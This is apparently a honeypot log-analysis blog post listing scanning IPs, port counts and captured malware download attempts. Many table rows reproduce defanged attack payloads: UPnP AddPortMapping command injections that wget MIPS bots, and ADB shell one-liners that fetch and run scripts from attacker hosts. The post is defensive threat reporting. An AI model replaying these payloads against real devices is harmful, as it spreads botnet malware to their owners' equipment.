Honeypot quick analysis (days 64-70: 10/14-10/17)
This update is late, but I plan to post last week's analysis results one by one over the course of this week.
<Honeytrap analysis results>
* Traffic to port 80 is excluded.
The increase in detections on 10/16 was scanning activity from two IPs. They mainly scanned ports in the 30000 range, and both had already been reported as suspicious IPs by external sources.
Source IP | Detections | Summary |
--- | --- | --- |
185[.]222[.]209[.]38 | 7,517 | Scanning of ports in the 30000 range |
62[.]76[.]75[.]210 | 3,631 | Scanning of ports in the 30000 range |

IP address | Organization | Reported on |
--- | --- | --- |
185.222.209.38 | Cloud Core LP | AbuseIPDB |
62.76.75.210 | OOO Serverland | AbuseIPDB |
<Traffic by destination port>
Destination port | Detections |
--- | --- |
445 | 12030 |
3389 | 336 |
22 | 279 |
1433 | 261 |
8080 | 231 |
81 | 209 |
8545 | 194 |
2222 | 169 |
8022 | 156 |
222 | 152 |
<Traffic to port 8022>
Investigation showed that this was SSH-related traffic (the client banner below).
Payload:
SSH-2.0-libssh2_1.7.0..
<Malware detections>
There was no major change in detection trends.
Destination port | Source IP | Malware download | Payload | Detections |
--- | --- | --- | --- | --- |
52869 | 217[.]61[.]3[.]138 | hxxp://76[.]74[.]177[.]230/seraph[.]mips | POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 636..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.23.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/seraph.mips -O seraph`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> | 27 |
52869 | 80[.]211[.]44[.]143 | hxxp://107[.]191[.]99[.]230/loli[.]mips | POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 633..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/loli.mips -O loli`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> | 26 |
52869 | 80[.]211[.]103[.]12 | hxxp://107[.]191[.]99[.]230/loli[.]mips | POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 633..Accept-Encoding: gzip, deflate..SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping..Accept: */*..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-754.2.1.el6.x86_64..Connection: keep-alive....<?xml version="1.0" ?><s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /tmp/;wget hxxp://xxx.xxx.xxx.xxx/loli.mips -O loli`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope> | 18 |
5555 | 122[.]96[.]234[.]121 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 6 |
5555 | 5[.]27[.]11[.]146 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 4 |
52869 | 162[.]243[.]174[.]240 | hxxp://178[.]62[.]24[.]222/bins/hoho[.]mips | POST /picsdesc.xml HTTP/1.1..Host: xxx.xxx.xxx.xxx:52869..Content-Length: 652..User-Agent: python-requests/2.6.0 CPython/2.6.6 Linux/2.6.32-696.30.1.el6.x86_64..Connection: keep-alive..Accept: */*..Accept-Encoding: gzip, deflate.....<?xml version="1.0" ?>.<s:Envelope xmlns:s="hxxp://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="hxxp://schemas.xmlsoap.org/soap/encoding/">.<s:Body>.<u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1">.<NewRemoteHost></NewRemoteHost>.<NewExternalPort>47450</NewExternalPort>.<NewProtocol>TCP</NewProtocol>.<NewInternalPort>44382</NewInternalPort>.<NewInternalClient>`cd /tmp/; wget hxxp://xxx.xxx.xxx.xxx/bins/hoho.mips -O sp`</NewInternalClient>.<NewEnabled>1</NewEnabled>.<NewPortMappingDescription>syncthing</NewPortMappingDescription>.<NewLeaseDuration>0</NewLeaseDuration>.</u:AddPortMapping>.</s:Body>.</s:Envelope>. | 4 |
5555 | 202[.]62[.]20[.]234 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 2 |
5555 | 101[.]206[.]144[.]219 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 105[.]130[.]167[.]144 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 105[.]152[.]251[.]64 | hxxp://185[.]162[.]130[.]187/adbs2 | CNXN............2.......host::.OPEN............aJ......shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2. | 1 |
5555 | 106[.]18[.]202[.]32 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 111[.]197[.]142[.]125 | hxxp://185[.]162[.]130[.]187/adbs2 | CNXN............2.......host::.OPEN............aJ......shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2. | 1 |
5555 | 112[.]193[.]94[.]196 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 114[.]252[.]221[.]4 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 114[.]254[.]209[.]7 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... | 1 |
5555 | 114[.]35[.]37[.]242 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 117[.]94[.]148[.]81 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... | 1 |
5555 | 122[.]230[.]165[.]152 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 122[.]245[.]30[.]160 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 125[.]109[.]119[.]84 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 168[.]70[.]69[.]84 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 176[.]237[.]14[.]168 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 176[.]237[.]49[.]113 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 176[.]237[.]77[.]30 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 177[.]253[.]35[.]177 | hxxp://185[.]162[.]130[.]187/adbs2 | CNXN............2.......host::.OPEN............aJ......shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/adbs -O -> adbs; sh adbs; curl hxxp://xxx.xxx.xxx.xxx/adbs2 > adbs2; sh adbs2; rm adbs adbs2. | 1 |
5555 | 180[.]122[.]19[.]45 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 185[.]48[.]54[.]25 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 187[.]27[.]181[.]112 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 1[.]214[.]183[.]146 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]16[.]121 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]16[.]128 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]16[.]225 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]16[.]229 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]17[.]136 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]17[.]15 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]17[.]207 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]17[.]36 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]17[.]49 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]17[.]84 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]18[.]167 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]18[.]45 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]18[.]94 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]19[.]145 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]19[.]50 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]19[.]62 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]19[.]74 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]19[.]90 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]20[.]169 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]20[.]231 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]20[.]47 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]20[.]89 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]108 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]123 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]138 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]162 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]44 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]60 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 202[.]62[.]21[.]72 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 203[.]218[.]123[.]114 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 218[.]103[.]129[.]81 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 221[.]124[.]105[.]149 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 223[.]10[.]249[.]244 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 223[.]17[.]33[.]158 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 223[.]17[.]71[.]38 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 24[.]47[.]115[.]152 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 27[.]213[.]109[.]36 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 42[.]2[.]175[.]164 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 42[.]98[.]8[.]69 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... | 1 |
5555 | 58[.]153[.]243[.]222 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 58[.]254[.]52[.]232 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 5[.]27[.]138[.]218 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............@......shell:busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> /data/local/tmp/w; sh /data/local/tmp/w; rm /data/local/tmp/w; curl hxxp://xxx.xxx.xxx.xxx/c > /data/local/tmp/c; sh /data/local/tmp/c; rm /data/local/tmp/c........... | 1 |
5555 | 60[.]22[.]177[.]204 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 77[.]217[.]133[.]48 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 78[.]130[.]206[.]137 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 78[.]68[.]59[.]80 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 80[.]178[.]84[.]82 | hxxp://207[.]148[.]78[.]152/bc | CNXN............2.......host::.OPEN............&A......shell:cd /data/local/tmp;wget hxxp://xxx.xxx.xxx.xxx/br -O- >br;sh br;busybox wget hxxp://xxx.xxx.xxx.xxx/r -O- >r;sh r;curl hxxp://xxx.xxx.xxx.xxx/c >c;sh c;busybox curl hxxp://xxx.xxx.xxx.xxx/bc >bc;sh bc;rm -rf bc br r c;. | 1 |
5555 | 82[.]222[.]171[.]202 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
5555 | 83[.]183[.]62[.]208 | hxxp://188[.]209[.]52[.]142/c | CNXN............2.......host::.OPEN.............%......shell:cd /data/local/tmp/; busybox wget hxxp://xxx.xxx.xxx.xxx/w -O -> w; sh w; rm w; curl hxxp://xxx.xxx.xxx.xxx/c > c; sh c; rm c. | 1 |
